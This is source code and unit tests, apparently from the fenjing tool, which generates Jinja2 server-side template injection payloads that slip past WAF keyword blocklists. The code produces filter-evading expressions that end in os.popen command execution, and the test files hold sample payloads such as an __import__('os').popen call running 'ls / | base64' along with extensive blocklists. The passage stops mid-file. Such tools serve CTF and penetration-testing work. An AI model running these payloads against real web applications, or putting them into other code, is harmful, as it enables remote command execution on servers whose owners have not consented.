        rich_escape(repr(waf_keywords)),
        extra={"markup": True, "highlighter": None},
    )
    options = Options(
        detect_mode=detect_mode,
        environment=environment,
        replaced_keyword_strategy=replaced_keyword_strategy,
        python_version=python_version,
        python_subversion=python_subversion,
        waf_keywords=waf_keywords,
    )
    full_payload_gen = FullPayloadGen(
        waf_func=lambda x: all(keyword not in x for keyword in waf_keywords),
        callback=None,
        options=options,
    )
    payload, will_print = full_payload_gen.generate("os_popen_read", command)
    if payload is None or will_print is None:
        logger.error(
            "Generate [yellow]%s[/] failed...",
            rich_escape(command),
            extra={"markup": True, "highlighter": None},
        )
        raise RunFailed()
    if not will_print:
        logger.warning(
            "This payload has [red]No Output[/]! We won't see anything!",
            extra={"markup": True, "highlighter": None},
        )
    if output_path:
        output_path.write_text(payload)
        logger.info(
            "[cyan bold]Done![/] Payload is written into [blue]%s[/]",
            rich_escape(output_path.as_posix()),
            extra={"markup": True, "highlighter": None},
        )
    else:
        print(payload, end="")  # don't print new line for base64


@main.command()
@click.option(
    "--host", "-h", default="127.0.0.1", help="需要监听的host, 默认为127.0.0.1"
)
@click.option("--port", "-p", default=11451, help="需要监听的端口, 默认为11451")
@click.option(
    "--open-browser/--no-open-browser", default=True, help="是否自动打开浏览器"
)
def webui(host, port, open_browser):
    """
    启动webui
    """
    webui_main(host, port, open_browser)


if __name__ == "__main__":
    main()



from typing import List
import logging

# pylint: disable=wildcard-import,unused-wildcard-import,missing-function-docstring,unused-argument

from ..payload_gen import expression_gen, precedence
from ..rules_utils import join_target, targets_from_pattern
from ..rules_types import Target
from ..const import *

logger = logging.getLogger("rules.basic_syntax")

# ---


@expression_gen
def gen_enclose_normal(context: dict, target):
    return [
        (
            EXPRESSION,
            precedence["enclose"],
            [
                (LITERAL, "("),
                (WHITESPACE,),
                target,
                (WHITESPACE,),
                (LITERAL, ")"),
            ],
        )
    ]


# ---


@expression_gen
def gen_wrap_normal(context: dict, targets: List[Target]):
    return [
        (LITERAL, "("),
        (WHITESPACE,),
        *targets,
        (WHITESPACE,),
        (LITERAL, ")"),
    ]


# ---


@expression_gen
def gen_string_concat_plus(context: dict, a, b):
    return [(PLUS, a, b)]


@expression_gen
def gen_string_concat_tilde(context: dict, a, b):
    target_list = [
        (ENCLOSE_UNDER, precedence["tilde"], a),
        (LITERAL, "~"),
        (ENCLOSE_UNDER, precedence["tilde"], b),
    ]
    return [(EXPRESSION, precedence["tilde"], target_list)]


@expression_gen
def gen_string_concat_join(context: dict, a, b):
    return [
        (
            EXPRESSION,
            precedence["plain_filter"],
            targets_from_pattern(
                "(STR_A,STR_B)|join",
                {
                    "STR_A": a,
                    "STR_B": b,
                },
            ),
        )
    ]


@expression_gen
def gen_string_concat_format(context: dict, a, b):
    target_list = [
        (
            ONEOF,
            [[(LITERAL, "'%s%s'")], [(LITERAL, '"%s%s"')], [(VARIABLE_OF, "%s%s")]],
        ),
        (LITERAL, "%"),
        (
            WRAP,
            [
                a,
                (LITERAL, ","),
                b,
            ],
        ),
    ]
    return [(EXPRESSION, precedence["mod"], target_list)]


# ---


@expression_gen
def gen_string_concatmany_noconcat(context: dict, parts):
    if len(parts) == 1:
        return parts
    return [(UNSATISFIED,)]


@expression_gen
def gen_string_concatmany_plus(context: dict, parts):
    targets = join_target(sep=(LITERAL, "+"), targets=parts)
    return [(EXPRESSION, precedence["plain_filter"], targets)]


@expression_gen
def gen_string_concatmany_tilde(context: dict, parts):
    targets = join_target(sep=(LITERAL, "~"), targets=parts)
    return [(EXPRESSION, precedence["plain_filter"], targets)]


@expression_gen
def gen_string_concatmany_join(context: dict, parts):
    targets = targets_from_pattern(
        "(PARTS)|join",
        {
            "PARTS": join_target(sep=(LITERAL, ","), targets=parts),
        },
    )
    return [(EXPRESSION, precedence["plain_filter"], targets)]


@expression_gen
def gen_string_concatmany_onebyone(context: dict, parts):
    answer = parts[0]
    for part in parts[1:]:
        answer = (STRING_CONCAT, answer, part)
    return [answer]


# lipsum.__globals__.concat(("a", "b"))


@expression_gen
def gen_string_concatmany_lipsumglobals1(context: dict, parts):
    target_list = (
        [
            (LITERAL, "lipsum.__globals__.concat(("),
        ]
        + join_target(sep=(LITERAL, ","), targets=parts)
        + [
            (LITERAL, "))"),
        ]
    )
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_concatmany_lipsumglobals2(context: dict, parts):
    return [
        (LITERAL, "lipsum["),
        (VARIABLE_OF, "__globals__"),
        (LITERAL, "]["),
        (VARIABLE_OF, "concat"),
        (LITERAL, "](("),
        *join_target(sep=(LITERAL, ","), targets=parts),
        (LITERAL, "))"),
    ]


@expression_gen
def gen_string_concatmany_lipsumglobals3(context: dict, parts):
    return [
        (LITERAL, "lipsum|attr("),
        (VARIABLE_OF, "__globals__"),
        (LITERAL, ")|attr("),
        (VARIABLE_OF, "__getitem__"),
        (LITERAL, ")("),
        (VARIABLE_OF, "concat"),
        (LITERAL, ")(("),
        *join_target(sep=(LITERAL, ","), targets=parts),
        (LITERAL, "))"),
    ]


# ---


@expression_gen
def gen_plus_normal(context: dict, a, b):
    a = (ENCLOSE_UNDER, precedence["plus"], a)
    b = (ENCLOSE_UNDER, precedence["plus"], b)
    return [(EXPRESSION, precedence["plus"], [a, (LITERAL, "+"), b])]


@expression_gen
def gen_plus_addfunc(context: dict, a, b):
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            [
                (ENCLOSE_UNDER, precedence["attribute"], a),
                (LITERAL, ".__add__"),
                (
                    WRAP,
                    [
                        b,
                    ],
                ),
            ],
        )
    ]


@expression_gen
def gen_plus_addfuncbyfilter(context: dict, a, b):
    get_add_func = (
        ONEOF,
        [
            [(LITERAL, "|attr('__add__')")],
            [(LITERAL, '|attr("__add__")')],
            [(LITERAL, '|attr("\\x5f\\x5fadd\\x5f\\x5f")')],
            [(LITERAL, "|attr("), (VARIABLE_OF, "__add__"), (LITERAL, ")")],
        ],
    )
    logger.debug("gen_plus_addfuncbyfilter: %s", repr(a))
    return [
        (
            EXPRESSION,
            precedence["called_filter"],
            [
                (ENCLOSE_UNDER, precedence["plain_filter"], a),
                get_add_func,
                (
                    WRAP,
                    [
                        b,
                    ],
                ),
            ],
        )
    ]


# ---


@expression_gen
def gen_mod_normal(context: dict, a, b):
    a = (ENCLOSE_UNDER, precedence["mod"], a)
    b = (ENCLOSE_UNDER, precedence["mod"], b)
    return [(EXPRESSION, precedence["mod"], [a, (LITERAL, "%"), b])]


@expression_gen
def gen_mod_func(context: dict, a, b):
    return [
        (
            EXPRESSION,
            precedence["function_call"],
            [
                (ENCLOSE_UNDER, precedence["attribute"], a),
                (LITERAL, ".__mod__"),
                (
                    WRAP,
                    [
                        b,
                    ],
                ),
            ],
        )
    ]


@expression_gen
def gen_mod_func2(context: dict, a, b):
    mod_func = (
        ONEOF,
        [
            [(LITERAL, "|attr('__mod__')")],
            [(LITERAL, '|attr("__mod__")')],
            [(LITERAL, "|attr("), (VARIABLE_OF, "__mod__"), (LITERAL, ")")],
        ],
    )
    return [
        (
            EXPRESSION,
            precedence["called_filter"],
            [
                (ENCLOSE_UNDER, precedence["plain_filter"], a),
                mod_func,
                (
                    WRAP,
                    [
                        b,
                    ],
                ),
            ],
        )
    ]


# ---


@expression_gen
def gen_function_call_forattr(context: dict, function_target, args_target_list):
    target_list = (
        [
            (ENCLOSE_UNDER, precedence["function_call"], function_target),
            (LITERAL, "("),
            (WHITESPACE,),
        ]
        + join_target((LITERAL, ","), args_target_list)
        + [
            (WHITESPACE,),
            (LITERAL, ")"),
        ]
    )
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_function_call_forattr2(context: dict, function_target, args_target_list):
    target_list = (
        [
            (ENCLOSE_UNDER, precedence["function_call"], function_target),
            (LITERAL, "("),
            (WHITESPACE,),
        ]
        + join_target((LITERAL, ","), args_target_list)
        + [
            (LITERAL, ","),
            (WHITESPACE,),
            (LITERAL, ")"),
        ]
    )
    return [(EXPRESSION, precedence["function_call"], target_list)]



import sys
from typing import (
    Any,
    Callable,
    Mapping,
    Tuple,
    List,
    Tuple,
    TypeVar,
    Union,
)


if sys.version_info >= (3, 8):
    from typing import Literal

    LiteralTarget = Tuple[Literal["literal"], str]
    ExpressionTarget = Tuple[Literal["expression"], int, List["Target"]]
    EncloseUnderTarget = Tuple[Literal["enclose_under"], int, "Target"]
    EncloseTarget = Tuple[Literal["enclose"], "Target"]
    UnsatisfiedTarget = Tuple[Literal["unsatisfied"],]
    OneofTarget = Tuple[Literal["oneof"], List[List["Target"]]]
    GeneratedExprTarget = Tuple[Literal["generated_expr"], "Target"]
    ListifyTarget = Tuple[Literal["listify"], "Target"]

    WithContextVarTarget = Tuple[Literal["with_context_var"], str]
    JinjaContextVarTarget = Tuple[Literal["jinja_context_var"], str]
    FlaskContextVarTarget = Tuple[Literal["flask_context_var"], str]
    RequirePython3Target = Tuple[Literal["require_python3"]]
    RequirePython3SubversionTarget = Tuple[Literal["require_python3_subversion"], int]
    RequireFlaskTarget = Tuple[Literal["require_flask"]]
    VariableOfTarget = Tuple[Literal["variable_of"], str]

    ZeroTarget = Tuple[Literal["zero"],]
    PositiveIntegerTarget = Tuple[Literal["positive_integer"], int]
    IntegerTarget = Tuple[Literal["integer"], int]

    WhiteSpaceTarget = Tuple[Literal["whitespace"]]

    StringConcatTarget = Tuple[Literal["string_string_concat"],]
    StringPercentTarget = Tuple[Literal["string_percent"],]
    StringPercentLowerCTarget = Tuple[Literal["string_percent_lower_c"],]
    StringUnderlineTarget = Tuple[Literal["string_underline"],]
    StringLowerCTarget = Tuple[Literal["string_lower_c"],]
    StringTwoUnderlineTarget = Tuple[Literal["string_twounderline"],]

    StringManyPercentLowerCTarget = Tuple[Literal["string_many_percent_lower_c"], int]
    StringManyFormatCTarget = Tuple[Literal["string_many_format_c"], int]
    CharTarget = Tuple[Literal["char"], str]
    StringTarget = Tuple[Literal["string"], str]

    FormularSumTarget = Tuple[Literal["formular_sum"], List["Target"]]
    AttributeTarget = Tuple[Literal["attribute"], "Target", str]
    ItemTarget = Tuple[Literal["item"], "Target", str]
    ChassAttributeTarget = Tuple[Literal["class_attribute"], "Target", str]
    ChainedAttriuteItemTarget = Tuple[Literal["chained_attribute_item"], ...]
    ImportFuncTarget = Tuple[Literal["import_func"],]
    EvalFuncTarget = Tuple[Literal["eval_func"],]
    EvalTarget = Tuple[Literal["eval"], str]
    ConfigTarget = Tuple[Literal["config"],]
    ModuleOSTarget = Tuple[Literal["module_os"],]
    OSPopenObj = Tuple[Literal["os_popen_obj"],]
    OSPopenRead = Tuple[Literal["os_popen_read"],]
    # Target = LiteralTarget
    Target = Union[
        LiteralTarget,
        ExpressionTarget,
        EncloseUnderTarget,
        EncloseTarget,
        UnsatisfiedTarget,
        OneofTarget,
        GeneratedExprTarget,
        ListifyTarget,
        WithContextVarTarget,
        JinjaContextVarTarget,
        FlaskContextVarTarget,
        RequirePython3Target,
        RequirePython3SubversionTarget,
        RequireFlaskTarget,
        VariableOfTarget,
        ZeroTarget,
        PositiveIntegerTarget,
        IntegerTarget,
        WhiteSpaceTarget,
        StringConcatTarget,
        StringPercentTarget,
        StringPercentLowerCTarget,
        StringUnderlineTarget,
        StringLowerCTarget,
        StringTwoUnderlineTarget,
        StringManyPercentLowerCTarget,
        StringManyFormatCTarget,
        CharTarget,
        StringTarget,
        FormularSumTarget,
        AttributeTarget,
        ItemTarget,
        ChassAttributeTarget,
        ChainedAttriuteItemTarget,
        ImportFuncTarget,
        EvalFuncTarget,
        EvalTarget,
        ConfigTarget,
        ModuleOSTarget,
        OSPopenObj,
        OSPopenRead,
    ]
else:
    LiteralTarget = Tuple
    ExpressionTarget = Tuple
    EncloseUnderTarget = Tuple
    EncloseTarget = Tuple
    UnsatisfiedTarget = Tuple
    OneofTarget = Tuple
    WithContextVarTarget = Tuple
    FlaskContextVarTarget = Tuple
    JinjaContextVarTarget = Tuple
    RequirePython3Target = Tuple
    Target = Tuple

ContextExpressions = Mapping[str, Tuple[Any, int]]


ExpressionGeneratorReturn = TypeVar("ExpressionGeneratorReturn", bound=List[Target])
ExpressionGenerator = Callable[..., ExpressionGeneratorReturn]
TargetAndSubTargets = List[Tuple[Target, List[Target]]]
PayloadGeneratorResult = Tuple[str, ContextExpressions, TargetAndSubTargets]



# pylint: disable=wildcard-import,unused-wildcard-import,missing-function-docstring,unused-argument

from ..payload_gen import expression_gen, precedence
from ..rules_utils import targets_from_pattern


from ..const import *


# ---


@expression_gen
def gen_os_popen_obj_normal(context, cmd):
    return [(FUNCTION_CALL, (ATTRIBUTE, (MODULE_OS,), "popen"), [(STRING, cmd)])]


# ---


@expression_gen
def gen_os_popen_read_normal(context, cmd):
    return [(FUNCTION_CALL, (ATTRIBUTE, (OS_POPEN_OBJ, cmd), "read"), [])]


@expression_gen
def gen_os_popen_read_normal2(context, cmd):
    return [(FUNCTION_CALL, (ATTRIBUTE, (OS_POPEN_OBJ, cmd), "read"), [(INTEGER, -1)])]


@expression_gen
def gen_os_popen_read_eval(context, cmd):
    code = f"__import__('os').popen({cmd!r}).read()"
    return [
        (EVAL, (STRING, code)),
    ]



import sys  # noqa

sys.path.append("..")  # noqa

import unittest
import fenjing
import string


from fenjing.payload_gen import PayloadGenerator, expression_gens
from fenjing.rules_utils import precedence
from fenjing.wordlist import CHAR_PATTERNS
from fenjing import const
import logging

from jinja2 import Template, TemplateError

fenjing.payload_gen.logger.setLevel(logging.ERROR)


def get_payload_gen(blacklist, context):
    def waf_func(x):
        return all(word not in x for word in blacklist)

    return PayloadGenerator(
        waf_func,
        context,
        options=fenjing.Options(python_version=fenjing.const.PythonVersion.PYTHON3),
    )


class PayloadGenTestsStringExpr(unittest.TestCase):
    def setUp(self):
        self.payload_gen = get_payload_gen([], {})
        self.target_strings = [
            "aaa",
            "114",
            "\\x61",
            "echo 123 | base64 -d",
            "!@#$%^&|;-_ ()[]{}",
            "print(114514)\n\n",
            "__globals__",
            "__114514__",
        ]
        for s in const.EXTRA_TARGETS:
            self.payload_gen.add_generated_expr(
                (const.STRING, s), self.payload_gen.generate_detailed(const.STRING, s)
            )

    def test_rules(self):
        for rule in expression_gens["string"]:
            for target_string in self.target_strings:
                target_list = rule({}, target_string)
                result = self.payload_gen.generate_by_list(target_list)
                if not result:
                    continue
                try:
                    render_result = Template("{{" + result[0] + "}}").render()
                except Exception as e:
                    raise ValueError(
                        f"{rule.__name__} failed generating {target_string!r} {result[0]=}"
                    ) from e
                self.assertIn(
                    target_string,
                    render_result,
                    f"{rule.__name__} failed generating {target_string!r} "
                    + f"{result[0]=} {render_result=}",
                )


class PositiveIntegers(unittest.TestCase):
    def setUp(self):
        self.payload_gen = get_payload_gen([], {})

    def test_rules(self):
        for rule in expression_gens["positive_integer"]:
            for target_integer in range(0, 150):
                target_list = rule({}, target_integer)
                result = self.payload_gen.generate_by_list(target_list)
                if not result:
                    continue
                try:
                    render_result = Template("{{" + result[0] + "}}").render()
                except Exception as e:
                    raise ValueError(
                        f"{rule.__name__} failed generating {target_integer!r} {result[0]=} {target_list=}"
                    ) from e
                self.assertIn(
                    str(target_integer),
                    render_result,
                    f"{rule.__name__} failed generating {target_integer!r} {result[0]=} {target_list=}",
                )


class PayloadGenTestsStringPiecesExpr(unittest.TestCase):
    def setUp(self):
        self.payload_gen = get_payload_gen([], {})

    def test_many_format_c(self):
        for rule in expression_gens["string_many_format_c"]:
            target_list = rule({}, 3)
            result = self.payload_gen.generate_by_list(target_list)
            if not result:
                continue
            try:
                render_result = Template("{{" + result[0] + "}}").render()
            except Exception as e:
                raise ValueError(
                    f"{rule} failed generating string_many_format_c"
                ) from e
            self.assertIn("{:c}" * 3, render_result)

    def test_many_percent_lower_c(self):
        for rule in expression_gens["string_many_percent_lower_c"]:
            target_list = rule({}, 3)
            result = self.payload_gen.generate_by_list(target_list)
            if not result:
                continue
            try:
                render_result = Template("{{" + result[0] + "}}").render()
            except Exception as e:
                raise ValueError(
                    f"{rule} failed generating string_many_percent_lower_c"
                ) from e
            self.assertIn("%c" * 3, render_result)

    def test_percent(self):
        for rule in expression_gens["string_percent"]:
            target_list = rule({})
            result = self.payload_gen.generate_by_list(target_list)
            if not result:
                continue
            try:
                render_result = Template("{{" + result[0] + "}}").render()
            except Exception as e:
                raise ValueError(f"{rule} failed generating string_percent") from e
            self.assertIn("%", render_result)

    def test_lower_c(self):
        for rule in expression_gens["string_lower_c"]:
            target_list = rule({})
            result = self.payload_gen.generate_by_list(target_list)
            if not result:
                continue
            try:
                render_result = Template("{{" + result[0] + "}}").render()
            except Exception as e:
                raise ValueError(f"{rule} failed generating string_percent") from e
            self.assertIn("c", render_result)


class PayloadGenTestsTargetRules(unittest.TestCase):

    def setUp(self):
        super().setUp()
        self.context = {
            "l": (1, precedence["literal"]),
            "e": (3, precedence["literal"]),
            "lo": (10, precedence["literal"]),
            "loo": (100, precedence["literal"]),
            "eoo": (300, precedence["literal"]),
        }
        self.context_payload = (
            "{%set l=1%}{%set e=3%}{%set lo=10%}{%set loo=100%}{%set eoo=300%}"
        )
        self.payload_gen = get_payload_gen([], self.context)

    def target_test(self, target):
        gen_type = target[0]
        for gen_func in expression_gens[gen_type]:
            try:
                target_list = gen_func(self.context, *target[1:])
            except Exception as e:
                raise RuntimeError(
                    f"Generate failed for rule {gen_func.__name__}"
                ) from e
            result = self.payload_gen.generate_by_list(target_list)

            if not result:
                continue
            try:
                str_result, _, _ = result
                Template(self.context_payload + f"Hello, {str_result}").render()
            except TemplateError as e:
                raise RuntimeError(f"Render failed for rule {gen_func.__name__}") from e

    def test_targets(self):
        targets = [
            (const.VARIABLE_OF, "%c"),
            (const.ZERO,),
            (const.INTEGER, 11),
            (const.INTEGER, 123),
            (const.PLUS, (const.INTEGER, 98), (const.INTEGER, 37)),
            (const.MULTIPLY, (const.INTEGER, 3), (const.INTEGER, 37)),
            (const.MULTIPLY, (const.STRING, "a"), (const.INTEGER, 11)),
            (const.STRING_PERCENT,),
            (const.STRING_LOWERC,),
            (const.STRING_PERCENT_LOWER_C,),
            (const.STRING_MANY_PERCENT_LOWER_C, 11),
            (const.STRING, "a"),
            (const.STRING, "__class__"),
            (const.STRING, "echo 'cracked\"\\'"),
            (const.STRING, "ls /;"),
            (const.MODULE_OS),
            (const.OS_POPEN_READ, "echo 'cracked\"\\'"),
        ]
        for target in targets:
            logging.info("Testing target: %s", repr(target))
            self.target_test(target)


class PayloadGenTestCaseSimple(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.payload_gen = get_payload_gen(
            [
                "[",
            ],
            {},
        )

    def test_string(self):
        strings = [
            "123",
            "asdf",
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for target_string in strings:
            self.assertIsNotNone(self.payload_gen.generate(const.STRING, target_string))

    def test_os_popen_read(self):
        self.assertIsNotNone(
            self.payload_gen.generate(const.OS_POPEN_READ, "echo fen  jing;")
        )


class PayloadGenTestCaseNoNumber(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.payload_gen = get_payload_gen(
            ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"],
            {
                "l": (1, precedence["literal"]),
                "e": (3, precedence["literal"]),
                "lo": (10, precedence["literal"]),
                "loo": (100, precedence["literal"]),
                "eoo": (300, precedence["literal"]),
            },
        )

    def test_integers(self):
        for num in range(1, 128):
            self.assertIsNotNone(self.payload_gen.generate(const.INTEGER, num))

    def test_string(self):
        strings = [
            "123",
            "asdf",
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for target_string in strings:
            self.assertIsNotNone(self.payload_gen.generate(const.STRING, target_string))

    def test_os_popen_read(self):
        self.assertIsNotNone(
            self.payload_gen.generate(const.OS_POPEN_READ, "echo fen  jing;")
        )


class PayloadGenTestCaseHard(unittest.TestCase):
    def setUp(self) -> None:
        super().setUp()
        self.payload_gen = get_payload_gen(
            [
                "config",
                "self",
                "g",
                "os",
                "class",
                "length",
                "mro",
                "base",
                "lipsum",
                "[",
                '"',
                "'",
                "_",
                ".",
                "+",
                "~",
                "{{",
                "0",
                "1",
                "2",
                "3",
                "4",
                "5",
                "6",
                "7",
                "8",
                "9",
                "０",
                "１",
                "２",
                "３",
                "４",
                "５",
                "６",
                "７",
                "８",
                "９",
            ],
            {
                "l": (1, precedence["literal"]),
                "e": (3, precedence["literal"]),
                "lo": (10, precedence["literal"]),
                "loo": (100, precedence["literal"]),
                "eoo": (300, precedence["literal"]),
            },
        )

    def test_targets(self):
        targets = [
            (const.STRING_PERCENT,),
            (const.STRING_LOWERC,),
            (const.INTEGER, 11),
            (const.STRING, "a"),
            (const.STRING_PERCENT_LOWER_C,),
            (const.STRING_MANY_PERCENT_LOWER_C, 11),
            (const.STRING, "ls /;"),
        ]
        for target in targets:
            result = self.payload_gen.generate(target[0], *target[1:])
            self.assertIsNotNone(result, repr(target))

    def test_string(self):
        test_strings = [
            string.digits,
            string.ascii_lowercase,
            "__dunder__",
            "__import__('os').popen('echo test_command/$(ls / | base64 -w)').read()",
        ]
        for target_string in test_strings:
            self.assertIsNotNone(
                self.payload_gen.generate(const.STRING, target_string), target_string
            )

    def test_os_popen_read(self):
        self.assertIsNotNone(
            self.payload_gen.generate(const.OS_POPEN_READ, "echo fen  jing;")
        )


class WordlistTest(unittest.TestCase):
    def test_char_patterns(self):
        for pattern, indexes in CHAR_PATTERNS.items():
            for i, c in indexes.items():
                expr = pattern.replace("INDEX", str(i))
                payload = "{%if (EXPR)==VALUE%}yes{%endif%}".replace(
                    "EXPR", expr
                ).replace("VALUE", repr(c))
                result = Template(payload).render()
                assert "yes" in result, f"Test {pattern!r} at {i} failed, {result=}"



import re
import logging

# pylint: disable=wildcard-import,unused-wildcard-import,missing-function-docstring,unused-argument,consider-using-f-string

from ..payload_gen import expression_gen, precedence
from ..rules_utils import (
    targets_from_pattern,
    str_escape,
    join_target,
)
from ..rules_types import *

from ..const import *


logger = logging.getLogger("rules.string")

# ---
# 以下的gen_string会互相依赖，但是产生互相依赖时传入的字符串长度会减少所以不会发生无限调用


@expression_gen
def gen_string_1(context: dict, value: str):
    chars = [str_escape(c, "'") for c in value]
    target_list = [(LITERAL, "'{}'".format("".join(chars)))]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_2(context: dict, value: str):
    chars = [str_escape(c, '"') for c in value]
    target_list = [(LITERAL, '"{}"'.format("".join(chars)))]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_manypercentlowerc(context: dict, value: str):
    if value.replace("%c", "") != "" or len(value) == "":
        return [(UNSATISFIED,)]
    return [(STRING_MANY_PERCENT_LOWER_C, value.count("%c"))]


@expression_gen
def gen_string_twostringconcat(context: dict, value: str):
    if len(value) < 2 or len(value) > 20:
        return [(UNSATISFIED,)]
    target_list = [
        # (LITERAL, "'"),  # ONEOF should output a valid expression
        (
            ONEOF,
            [
                [
                    (LITERAL, "'{}'".format(str_escape(value[:i], "'"))),
                    (LITERAL, "'{}'".format(str_escape(value[i:], "'"))),
                ]
                for i in range(1, len(value))
            ],
        ),
    ]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_twostringconcat2(context: dict, value: str):
    if len(value) < 2 or len(value) > 20:
        return [(UNSATISFIED,)]
    target_list = [
        # (LITERAL, '"'),  # ONEOF should output a valid expression
        (
            ONEOF,
            [
                [
                    (LITERAL, '"{}"'.format(str_escape(value[:i], '"'))),
                    (LITERAL, '"{}"'.format(str_escape(value[i:], '"'))),
                ]
                for i in range(1, len(value))
            ],
        ),
    ]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_concatdunder(context: dict, value: str):
    if not re.match("^__[A-Za-z0-9_]+__$", value):
        return [(UNSATISFIED,)]
    target_list = [
        (LITERAL, "'_'"),
        (LITERAL, "'{}'".format(str_escape(value[1:-1], "'"))),
        (LITERAL, "'_'"),
    ]
    return [(EXPRESSION, precedence["literal"], target_list)]


@expression_gen
def gen_string_concatdunder2(context: dict, value: str):
    if not re.match("^__[A-Za-z0-9_]+__$", value):
        return [(UNSATISFIED,)]
    target_list = [
        (LITERAL, '"_"'),
        (LITERAL, '"{}"'.format(str_escape(value[1:-1], '"'))),
        (LITERAL, '"_"'),
    ]
    return [(EXPRESSION, precedence["literal"], target_list)]


# 如果上面的规则能用那就不要随便用上下文中的变量，否则会增加payload长度
@expression_gen
def gen_string_context(context: dict, value: str):
    return [(VARIABLE_OF, value)]


@expression_gen
def gen_string_dunder(context: dict, value: str):
    if value != "__":
        return [(UNSATISFIED,)]
    return [(STRING_TWOUNDERLINE,)]


# 如果将__xxx__拆分成_ _xxx_ _
# 那中间 _xxx_ 的表达式可能会过于复杂
# 为了缩短payload还是拆成 __ xxx __ 比较好


@expression_gen
def gen_string_removedunder2(context: dict, value: str):
    if not re.match("^__[A-Za-z0-9_]+__$", value):
        return [(UNSATISFIED,)]
    return [
        (
            STRING_CONCATMANY,
            [
                (STRING_TWOUNDERLINE,),
                (STRING, value[2:-2]),
                (STRING_TWOUNDERLINE,),
            ],
        )
    ]


@expression_gen
def gen_string_removedunder3(context: dict, value: str):
    if not re.match("^__[A-Za-z][A-Za-z0-9]+__$", value):
        return [(UNSATISFIED,)]
    # "%slo%%s"%("__")%("__")
    targets = targets_from_pattern(
        "STRING%DUNDER%DUNDER",
        {
            "STRING": (
                ENCLOSE_UNDER,
                precedence["mod"],
                (STRING, "%s" + value[2:-2] + "%%s"),
            ),
            "DUNDER": (ENCLOSE_UNDER, precedence["mod"], (STRING_TWOUNDERLINE,)),
        },
    )
    return [(EXPRESSION, precedence["mod"], targets)]


@expression_gen
def gen_string_removedunder4(context: dict, value: str):
    if not re.match("^__[A-Za-z][A-Za-z0-9]+__$", value):
        return [(UNSATISFIED,)]
    # "%slo%%s"|format("__")|format("__")
    targets = targets_from_pattern(
        "{STRING} | format( {DUNDER} ) | format( {DUNDER} )",
        {
            "{STRING}": (
                ENCLOSE_UNDER,
                precedence["mod"],
                (STRING, "%s" + value[2:-2] + "%%s"),
            ),
            "{DUNDER}": (ENCLOSE_UNDER, precedence["mod"], (STRING_TWOUNDERLINE,)),
            " ": (WHITESPACE,),
        },
    )
    return [(EXPRESSION, precedence["called_filter"], targets)]


@expression_gen
def gen_string_reverse1(context: dict, value: str):
    chars = [str_escape(c, "'") for c in value]
    target_list = [(LITERAL, "'{}'[::-1]".format("".join(chars[::-1])))]
    return [(EXPRESSION, precedence["slide"], target_list)]


@expression_gen
def gen_string_reverse2(context: dict, value: str):
    chars = [str_escape(c, '"') for c in value]
    target_list = [(LITERAL, '"{}"[::-1]'.format("".join(chars[::-1])))]
    return [(EXPRESSION, precedence["slide"], target_list)]


@expression_gen
def gen_string_lower1(context: dict, value: str):
    if value.upper().lower() != value:
        return [(UNSATISFIED,)]
    chars = [str_escape(c, "'") for c in value.upper()]
    target_list = [(LITERAL, "'{}'.lower()".format("".join(chars)))]
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_lower2(context: dict, value: str):
    if value.upper().lower() != value:
        return [(UNSATISFIED,)]
    chars = [str_escape(c, '"') for c in value.upper()]
    target_list = [(LITERAL, '"{}".lower()'.format("".join(chars)))]
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_lower3(context: dict, value: str):
    if value.upper().lower() != value:
        return [(UNSATISFIED,)]
    chars = [str_escape(c, "'") for c in value.upper()]
    target_list = [(LITERAL, "'{}'.lower( )".format("".join(chars)))]
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_lower4(context: dict, value: str):
    if value.upper().lower() != value:
        return [(UNSATISFIED,)]
    chars = [str_escape(c, '"') for c in value.upper()]
    target_list = [(LITERAL, '"{}".lower( )'.format("".join(chars)))]
    return [(EXPRESSION, precedence["function_call"], target_list)]


@expression_gen
def gen_string_lowerfilter1(context: dict, value: str):
    if value.upper().lower() != value:
        return [(UNSATISFIED,)]
    chars = [str_escape(c, "'") for c in value.upper()]
    target_list = [(LITERAL, "'{}'|lower".format("".join(chars)))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_lowerfilter2(context: dict, value: str):
    if value.upper().lower() != value:
        return [(UNSATISFIED,)]
    chars = [str_escape(c, '"') for c in value.upper()]
    target_list = [(LITERAL, '"{}"|lower'.format("".join(chars)))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_lowerfilterdict1(context: dict, value: str):
    if value.upper().lower() != value or not re.match(
        r"^[A-Za-z_][A-Za-z0-9_]+$", value
    ):
        return [(UNSATISFIED,)]
    chars = [str_escape(c, '"') for c in value.upper()]
    target_list = [(LITERAL, "dict({}=i)|first|lower".format("".join(chars)))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_lowerfilterdict2(context: dict, value: str):
    if value.upper().lower() != value or not re.match(
        r"^[A-Za-z_][A-Za-z0-9_]+$", value
    ):
        return [(UNSATISFIED,)]
    chars = [str_escape(c, '"') for c in value.upper()]
    target_list = [(LITERAL, "dict({}=i)|last|lower".format("".join(chars)))]
    return [(EXPRESSION, precedence["plain_filter"], target_list)]


@expression_gen
def gen_string_concat1(context: dict, value: str):
    target_list = [
        (
            LITERAL,
            "+".join("'{}'".format(str_escape(c, "'")) for c in value),
        )
    ]
    return [(EXPRESSION, precedence["plus"], target_list)]


@expression_gen
def gen_string_concat2(context: dict, value: str):
    target_list = [
        (
            LITERAL,
            "+".join('"{}"'.format(str_escape(c, '"')) for c in value),
        )
    ]
    return [(EXPRESSION, precedence["plus"], target_list)]


@expression_gen
